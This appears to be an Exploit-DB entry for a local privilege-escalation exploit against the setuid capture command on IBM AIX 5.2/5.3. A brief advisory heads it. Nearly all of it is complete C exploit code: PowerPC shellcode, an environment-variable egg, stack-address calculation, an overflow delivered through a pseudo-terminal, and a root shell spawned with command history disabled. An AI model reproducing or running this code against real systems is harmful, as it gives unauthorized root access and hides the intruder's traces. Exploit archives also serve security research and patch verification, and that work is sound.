IBM AIX 5.2/5.3 - Capture Command Local Stack Buffer Overflow

EDB-ID:

30399


Author:

qaaz

Type:

local


Platform:

AIX

Date:

2007-07-26


// source: https://www.securityfocus.com/bid/25075/info

IBM AIX is prone to a local, stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input to a program that is installed setuid-superuser.

Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Failed attacks will likely cause denial-of-service conditions. 

/* 07/2007: public release
 *
 * qaaz@aix:~$ ./aix-capture
 * --------------------------------
 *  AIX capture Local Root Exploit
 *  By qaaz
 * --------------------------------
 * bash: no job control in this shell
 * bash-3.00#
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>

#define TARGET		"/usr/bin/capture"
#define VALCNT		40

#define MAX(x,y)	((x) > (y) ? (x) : (y))
#define ALIGN(x, y)	(((x) + (y) - 1) / (y) * (y))

unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";

void	shell(int p1[2], int p2[2])
{
	ssize_t	n;
	fd_set	rset;
	char	buf[4096];

	for (;;) {
		FD_ZERO(&rset);
		FD_SET(p1[0], &rset);
		FD_SET(p2[0], &rset);

		n = select(MAX(p1[0], p2[0]) + 1,
		           &rset, NULL, NULL, NULL);
		if (n < 0) {
			perror("[-] select");
			break;
		}

		if (FD_ISSET(p1[0], &rset)) {
			n = read(p1[0], buf, sizeof(buf));
			if (n <= 0) break;
			write(p1[1], buf, n);
		}
		if (FD_ISSET(p2[0], &rset)) {
			n = read(p2[0], buf, sizeof(buf));
			if (n <= 0) break;
			write(p2[1], buf, n);
		}
	}
}

/* just because you don't understand it doesn't mean it has to be wrong */
ulong	get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
	ulong	top, len, off;
	int	i;

	len = 0;
	for (i = 0; argv[i]; i++)
		len += strlen(argv[i]) + 1;
	for (i = 0; envp[i]; i++)
		len += strlen(envp[i]) + 1;
	top = (ulong) argv[0] + ALIGN(len, 8);

	len = off = 0;
	for (i = 0; args[i]; i++)
		len += strlen(args[i]) + 1;
	for (i = 0; envs[i]; i++) {
		if (!strncmp(envs[i], "EGG=", 4))
			off = len + 4;
		len += strlen(envs[i]) + 1;
	}
	while (off & 3)
		strcat(envs[0], "X"), off++, len++;	

	return top - ALIGN(len, 4) + off;
}

int	main(int argc, char *argv[], char *envp[])
{
	char	pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
	char	*args[] = { TARGET, "/dev/null", NULL };
	char	*envs[] = { pad, bsh, egg, NULL };
	int	ptm, pts, pi[2];
	pid_t	child;

	sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
	sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());

	if (!envp[0]) {
		dup2(3, 0);

		setuid(geteuid());
		putenv("HISTFILE=/dev/null");
		execl("/bin/bash", "bash", "-i", NULL);
		execl("/bin/sh", "sh", "-i", NULL);
		perror("[-] execl");
		exit(1);
	} else if (argc && !strcmp(argv[0], "bsh")) {
		char	i, ch;
		ulong	addr = get_addr(argv, envp, args, envs);

		printf("\x1b[");
		for (i = 0; i < VALCNT; i++)
			printf("%lu;", addr);
		printf("0A\n");
		fflush(stdout);

		while (read(0, &ch, 1) == 1)
			write(1, &ch, 1);
		exit(0);
	}

	printf("--------------------------------\n");
	printf(" AIX capture Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("--------------------------------\n");

	if (pipe(pi) < 0) {
		perror("[-] pipe");
		exit(1);
	}

	if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
	    (pts = open(ttyname(ptm), O_RDWR)) < 0) {
		perror("[-] pty");
		exit(1);
	}

	if ((child = fork()) < 0) {
		perror("[-] fork");
		exit(1);
	}

	if (child == 0) {
		dup2(pts, 0);
		dup2(pts, 1);
		dup2(pts, 2);

		dup2(pi[0], 3);

		execve(TARGET, args, envs);
		perror("[-] execve");
		exit(1);
	}

	close(pi[0]);
	close(pts);

	sleep(1);
	read(ptm, buf, sizeof(buf));

	write(ptm, " ", 1);
	shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
	kill(child, SIGTERM);
	waitpid(child, NULL, 0);
	return 0;
}